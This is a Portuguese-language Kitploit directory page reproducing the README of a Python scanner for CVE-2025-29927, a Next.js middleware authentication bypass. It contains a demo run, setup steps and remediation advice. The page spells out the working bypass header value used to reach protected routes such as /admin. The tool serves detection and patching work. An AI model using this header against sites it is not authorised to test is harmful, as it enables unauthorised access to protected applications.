Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sagsooz/cve-2025-29927
Vulnerability ScannersWeb Application ExploitationWeb SecurityPenetration TestingAuthenticationLearning & Education
GitHubsagsooz/cve-2025-29927

CVE-2025-29927

🔐 Python-based smart scanner for CVE-2025-29927 — Next.js middleware authentication bypass vulnerability. Detects meta refresh, keyword-based redirects, and more.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔍 CVE-2025-29927 - Detector de Bypass de Middleware do Next.js

Este scanner inteligente baseado em Python ajuda a detectar a vulnerabilidade CVE-2025-29927 em aplicações Next.js — um bypass crítico de middleware que permite que atacantes ignorem a autenticação usando um cabeçalho HTTP manipulado.

🧠 A ferramenta identifica não apenas redirecionamentos HTTP, mas também mecanismos de redirecionamento do lado do cliente, como <meta http-equiv="refresh">, redirecionamentos baseados em palavras-chave de login e bypasses silenciosos de autenticação.


🚀 Funcionalidades

  • ✅ Entrada interativa (URL alvo e caminho)
  • ✅ Detecção inteligente de:
    • Cabeçalhos de bypass x-middleware-subrequest
    • Redirecionamentos baseados em <meta refresh>
    • Conteúdo HTML com palavras-chave como login, sign in, authentication
  • ✅ Saída CLI com código de cores:
    • 🟩 Verde para respostas 2xx
    • 🟨 Amarelo para 3xx
    • 🟥 Vermelho para 4xx/5xx
  • ✅ Saída antecipada se o bypass for bem-sucedido
  • ✅ Fácil de estender e personalizar

📸 Demonstração

root@kitploit:~
$ python3 CVE-2025-29927.py

🌐 Digite a URL do site alvo (ex: http://localhost:3000): http://vulnerable.local
📁 Digite o caminho protegido (ex: /dashboard): /admin

→ Testando com cabeçalho: middleware:middleware:middleware:middleware:middleware
   ↳ Status HTTP: 200
   ↳ Redirecionamento detectado: Não

✅ VULNERÁVEL! Bypass bem-sucedido com cabeçalho:
   x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

🧑‍💻 Como Usar

1. Clone o repositório:

root@kitploit:~
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927

2. Instale as dependências:

root@kitploit:~
pip install -r requirements.txt

3. Execute o script:

root@kitploit:~
python3 CVE-2025-29927.py

📂 Estrutura do Projeto

root@kitploit:~
.
├── CVE-2025-29927.py   # Scanner interativo principal
├── requirements.txt            # Dependências Python
└── README.md                   # Este arquivo

📦 requirements.txt

root@kitploit:~
requests
beautifulsoup4
colorama

🛡️ Como Corrigir

Se sua aplicação for afetada, faça o seguinte:

  1. Atualize o Next.js para v15.2.3 ou superior (ou 14.2.25+ / 13.5.7+)
  2. Reforce o roteamento de middleware e evite depender exclusivamente de middleware para autenticação.
  3. Remova o cabeçalho x-middleware-subrequest na borda (ex: Nginx):
root@kitploit:~
proxy_set_header x-middleware-subrequest "";

ℹ️ Sobre a Vulnerabilidade

A CVE-2025-29927 permite que atacantes ignorem as verificações de middleware do Next.js manipulando o cabeçalho x-middleware-subrequest com valores manipulados, como:

root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

Em versões vulneráveis, isso desativa completamente a execução do middleware — permitindo acesso direto a rotas protegidas como /dashboard, /admin, etc.


📬 Contato

Mantido por: @mrzblackhat
Sinta-se à vontade para entrar em contato comigo no Telegram para sugestões, melhorias ou contribuições.


🏷 Tags

next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking


📄 Licença

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. Use com responsabilidade.

Baixar ferramenta